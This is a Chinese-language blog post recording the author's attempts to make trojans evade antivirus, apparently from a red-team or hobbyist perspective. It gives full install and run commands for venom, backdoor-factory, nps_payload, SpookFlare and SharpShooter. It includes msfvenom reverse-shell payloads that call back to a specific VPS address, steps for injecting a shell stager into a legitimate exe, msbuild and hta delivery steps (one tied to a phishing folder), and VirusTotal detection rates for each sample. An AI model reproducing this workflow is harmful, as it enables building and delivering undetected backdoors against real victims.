常规木马免杀处理-查杀情况记录2

Posted on In Views: Word count in article: 2.1k Reading time ≈ 8 mins.

常规木马免杀处理-查杀情况记录2

杀毒软件及免杀技巧资源汇总Anti-av

  • 杀毒软件及免杀技巧资源汇总Anti-av

venom

  • venom-github

安装

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
1º - Download framework from github
git clone https://github.com/r00t-3xp10it/venom.git

2º - Set execution permitions
cd venom-main
sudo find ./ -name "*.sh" -exec chmod +x {} \;
sudo find ./ -name "*.py" -exec chmod +x {} \;

3º - Install all dependencies
cd aux && sudo ./setup.sh

4º - Run main tool
sudo ./venom.sh

Update venom instalation (compare local version againts github oficial version)
sudo ./venom.sh -u

傻瓜式操作

  • 选择模块4

windows/meterpreter/reverse_tcp

文件名: ven_c_exe

选none-obfuscation(default)

然后将生成的shellcode贴进去

选multi-handler(default)

然后在output文件夹中将exe文件

upx加壳

结果: 火绒查杀

virustotal查杀率: 28/70 外网msf成功上线

不加upx壳

结果: 火绒查杀

virustotal查杀率: 28/70 外网msf成功上线

效果还不错

  • 选择模块1

生成dll

installer.bat

rundll32.exe dll_ven.dll,main

火绒报毒

virustotal查杀率: 4/65

运行发现找不到指定模块

venom其它模块待尝试

shellter-win

vps: 45.32.137.154
port: 3344

生成的exe外网msf成功上线 (过火绒)

virustotal查杀: 16/70

+upx

virustotal查杀: 16/71 (过火绒)

backdoor-factory

  • the-backdoor-factory
  • kali安装
  • docker backdoor-factory安装
1
2
3
docker pull secretsquirrel/the-backdoor-factory
docker run -it -v /root/test:/root secretsquirrel/the-backdoor-factory bash
# ./backdoor.py

backdoor-factory是把shellcode插⼊到⼀个正常的exe⽂件的代码”缝隙”中,类似于捆绑但不是捆绑,所以需要提前准备⼀个被捆绑的宿主exe⽂件

在”捆绑”之前,BDF需要检查⼀下宿主exe能否被⽀持”插⼊”shellcode。主要使⽤下⾯两个参数

1
2
3
4
5
6
7
8
9
-f:指定测试程序
-S:检查该程序是否支持

root@6331b69b7a72:/the-backdoor-factory# ./backdoor.py -f /root/x86.exe -S
         
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
/root/x86.exe is supported.
  • 搜索该⽂件可⽤的Code Caves(代码缝隙)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
-c:code cave(代码裂缝)
-l:代码裂缝大小

./backdoor.py -f /root/x86.exe -c -l 300
[*] Looking for caves
We have a winner: .text
->Begin Cave 0x7450
->End of Cave 0x7600
Size of Cave (int) 432
SizeOfRawData 0x7200
PointerToRawData 0x400
End of Raw Data: 0x7600
**************************************************
We have a winner: .rdata
->Begin Cave 0x9201
->End of Cave 0x9400
Size of Cave (int) 511
SizeOfRawData 0x1c00
PointerToRawData 0x7800
End of Raw Data: 0x9400
**************************************************
We have a winner: /4
->Begin Cave 0xa2aa
->End of Cave 0xa400
Size of Cave (int) 342
SizeOfRawData 0x1000
PointerToRawData 0x9400
End of Raw Data: 0xa400
**************************************************
No section
->Begin Cave 0xac27
->End of Cave 0xae06
Size of Cave (int) 479
**************************************************
No section
->Begin Cave 0xae13
->End of Cave 0xb00e
Size of Cave (int) 507
**************************************************
We have a winner: /29
->Begin Cave 0x54023
->End of Cave 0x54200
Size of Cave (int) 477
SizeOfRawData 0x48800
PointerToRawData 0xba00
End of Raw Data: 0x54200
**************************************************
[*] Total of 6 caves foun
  • 获取该⽂件的可⽤payload
1
2
3
4
5
6
7
8
9
10
11
./backdoor.py -f /root/x86.exe -s -show
The following WinIntelPE32s are available: (use -s)
   cave_miner_inline
   iat_reverse_tcp_inline
   iat_reverse_tcp_inline_threaded
   iat_reverse_tcp_stager_threaded
   iat_user_supplied_shellcode_threaded
   meterpreter_reverse_https_threaded
   reverse_shell_tcp_inline
   reverse_tcp_stager_threaded
   user_supplied_shellcode_threaded

  • 说明:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    cave_miner_inline: 作为payload模板,⻓度为135,仅实现了控制流程跳转,不做其他操作,可⽤作⾃定义开发shellcode的模板

    reverse_shell_tcp_inline:
    对应的msf:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp

    meterpreter_reverse_https_threaded:
    对应的msf:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_https

    iat_reverse_tcp_inline 中的iat:
    iat为 Import Address Table (导⼊地址表)的缩写,如果PE⽂件的IAT不包含API LoadLibraryA和GetProcAddress,直接执⾏payload reverse_shell_tcp_inline会失败,iat_reverse_tcp_inline增加了修
    复IAT的功能,避免执⾏失败

    iat_reverse_tcp_stager_threaded:
    增加了修复IAT的功能

    user_supplied_shellcode_threaded:
    对应的msf:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    ⾃定义shellcode

  • ⽣成payload

1
2
3
4
5
6
7
8
./backdoor.py -f /root/x86.exe -s iat_reverse_tcp_stager_threaded -H 45.32.137.154 -P 3344 -J -o payload.exe

-c:code cave(代码裂缝)
-l:代码裂缝⼤⼩
-s:选择使⽤ payload 类型
-H:选择回连服务器地址
-P:回连服务器端⼝
-J:使⽤多代码裂缝注⼊

随机选择⼀个代码段进⾏插⼊shellcode,最后就可以⽣产新的后⻔程序。

  • 未加upx

火绒未查杀

外网msf成功回弹shell,但无效

virustotal 23/71

  • 加upx失败

  • 使⽤⾃⼰定义的shellcode

先⽤msfvenom⽣成raw格式的shellcode

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=45.32.137.154 LPORT=3344 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c

使⽤backdoor的user_supplied_shellcode_threaded模块加载⾃定义的shellcode

1
./backdoor.py -f /root/x86.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c -o payload2.exe
  • 未加upx

外网msf成功上线,能执行交互式shell

virustotal 30/71

免杀效果一般,不过可用

avet—AntiVirus-Evasion-Tool

  • avet

经测试本机kali,因缺少依赖,无法安装wine32,而使用wine32安装tdm64-gcc-9.2.0.exe

本机kali未测试成功,免杀效果应该不错

green-hat-suite

  • green-hat-suite

安装依赖

1
2
3
4
5
6
gem install os
apt-get install mingw-w64
apt-get install wine

# 安装tdm-gcc
TMP=`mktemp /tmp/XXXXXXXXX.exe` && wget https://sourceforge.net/projects/tdm-gcc/files/latest/download -O $TMP && wine $TMP && rm $TMP

本机kali由于缺少依赖,无法安装tdm-gcc,免杀效果中等

ASWCrypter

  • [ASWCrypter]https://github.com/AbedAlqaderSwedan1/ASWCrypter)

外网msf成功上线(火绒查杀)

virustotal 21/61

nps payload

  • nps_payload

vps: 45.32.137.154
port: 3344

安装

1
2
git clone https://github.com/trustedsec/nps_payload
pip install -r requirements.txt

nps_payload⽣成的xml需要使⽤msbuild来执⾏,hta⽂件可直接执⾏。

  • 利⽤nps_payload⽣成后⻔
  1. ⽣成基于msbuild的xml⽂件

xml文件执行方法:

1
2
3
4
5
6
7
8
9
10
11
12
[*] Generating PSH Payload...
[*] Generating MSF Resource Script...
[+] Metasploit resource script written to msbuild_nps.rc
[+] Payload written to msbuild_nps.xml

1. Run "msfconsole -r msbuild_nps.rc" to start listener.
2. Choose a Deployment Option (a or b): - See README.md for more information.
  a. Local File Deployment:
    - %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml
  b. Remote File Deployment:
    - wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml                                                                                
3. Hack the Planet!!

执行该xml文件

1
C:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe E:\邮箱钓鱼\virus\nps-payload\xml\msbuild_nps.xml

火绒查杀

外网msf成功上线,能执行交互式的shell

virustotal 17/59

  1. ⽣成hta⽂件

hta执行方法

1
2
3
4
5
6
[+] Metasploit resource script written to msbuild_nps.rc
[+] Payload written to msbuild_nps.hta

1. Run "msfconsole -r msbuild_nps.rc" to start listener.
2. Deploy hta file to web server and navigate from the victim machine.
3. Hack the Planet!!

火绒查杀

外网msf成功接收到交互式shell

virustotal 10/60

效果很不错

GreatSCT

  • GreatSCT

安装

1
2
3
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/setup
sudo ./setup.sh -c

使用说明

1
python3 GreatSCT.py -t Bypass --listpayloads

安装需要的依赖太多,本机kali无法使用,免杀效果一般,可以批量生成payload

SpookFlare

vps: 45.32.137.154
port: 3344

安装

1
2
3
git clone https://github.com/hlldz/SpookFlare.git
cd SpookFlare
pip install -r requirements.txt

生成payload,使⽤协议(仅⽀持http和https)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
SpookFlare [meterpreter/binary] > set LHOST 45.32.137.154
LHOST => 45.32.137.154
SpookFlare [meterpreter/binary] > set LPORT 3344
LPORT => 3344
SpookFlare [meterpreter/binary] > set ARCH x86
ARCH => x86
SpookFlare [meterpreter/binary] > set PROTO https
PROTO => https
SpookFlare [meterpreter/binary] > generate

 [*] Generating payload...

 [+] Binary loader code is successfully generated: output/GCrjxqRvMcyL.cs

 [*] You can use C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe or Visual Studie for compile C# code.

需要使⽤csc.exe编译成exe,命令格式如下

1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:test.exe test.cs

编译完成后火绒查杀,windows10上运行失败

效果非常差

SharpShooter

vps: 45.32.137.154
port: 3344

SharpSHooter⽀持分阶段(Staged)和⽆阶段(Shageless)Payload执⾏。分阶
段执⾏可以使⽤HTTP(S)或DNS这两种⽅式进⾏传输,或者两者同时使⽤。当分阶
段Payload被执⾏时,会尝试检索已经压缩的C#源代码⽂件,然后使⽤所选择的⽅
式进⾏Base64编码。随后,借助.NET CodeDom编译器,将C#源代码下载,并编
译到主机上。最后从源代码执⾏所需的⽅法。

安装

1
2
git clone https://github.com/mdsecactivebreach/SharpShooter
pip install -r requirements.txt

各种payload的⽣成命令。

  1. 不分阶段的JavaScript
1
2
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo
--rawscfile ./raw.txt --sandbox 1=contoso,2,3
  1. 不分阶段的hta
1
2
SharpShooter.py --stageless --dotnetver 2 --payload hta --output
foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
  1. 分阶段的VBS
1
2
3
4
SharpShooter.py --payload vbs --delivery both --output foo --web
http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --
scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template
mcafee --dotnetver 4
  1. 使⽤js加载⾃定义C#代码
1
2
3
4
5
SharpShooter.py --dotnetver 2 --payload js --sandbox 2,3,4,5 --
delivery web --refs mscorlib.dll,System.Windows.Forms.dll --
namespace MDSec.SharpShooter --entrypoint Main --web
http://www.phish.com/implant.payload --output malicious --smuggle -
-template mcafee
  1. 使⽤vbs调⽤COM⽅法执⾏wmic.exe
1
2
3
SharpShooter.py --stageless --dotnetver 2 --payload vbs --output
foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com
outlook --awlurl http://192.168.2.8:8080/foo.xsl
  1. 创建hta调⽤XMLDOM来执⾏shellcode
1
2
3
SharpShooter.py --stageless --dotnetver 2 --payload hta --output
foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com
xslremote --awlurl http://192.168.2.8:8080/foo.xsl
  1. 创建VBA调⽤XMLDOM来执⾏shellcode
1
2
3
SharpShooter.py --stageless --dotnetver 2 --payload macro --output
foo --rawscfile ./x86payload.bin --com xslremote --awlurl
http://192.168.2.8:8080/foo.xsl
  1. 创建Excel 4.0 符号链接⽂件执⾏shellcode
1
2
SharpShooter.py --payload slk --output foo --rawscfile
~./x86payload.bin --smuggle --template mcafee

要求shellcode不能包含空字符

1
2
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x86 --
platform windows -e x86/shikata_ga_nai -f raw -o shellcodeencoded.bin -b '\x00'
  • 生成hta后门

先⽤msfvenom⽣成⼀个raw格式的shellcode

1
msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=45.32.137.154 LPORT=3344 -f raw -o shellcode.txt

使⽤SharpShooter创建hta后⻔

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:~/SharpShooter# python SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile /root/test/shellcode.txt --sandbox 4 --smuggle --template mcafee

       _____ __                    _____ __                __           
      / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
      \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
     ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /    
    /____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/     
                         /_/                                            

     Dominic Chell, @domchell, MDSec ActiveBreach, v2.0
    
[*] Avoiding bad MACs
[*] Written delivery payload to output/foo.hta
[*] File [./output/foo.hta] successfully loaded !
[*] Encrypted input file with key [vpdxpeqiea]
[*] File [./output/foo.html] successfully created !

火绒查杀为下载者木马,外网msf没有shell回弹,可能是测试的win10为x64,生成的shellcode为x86

virustotal 24/60

功能较多,查杀率一般

未完持续

木马检测

https://www.virustotal.com/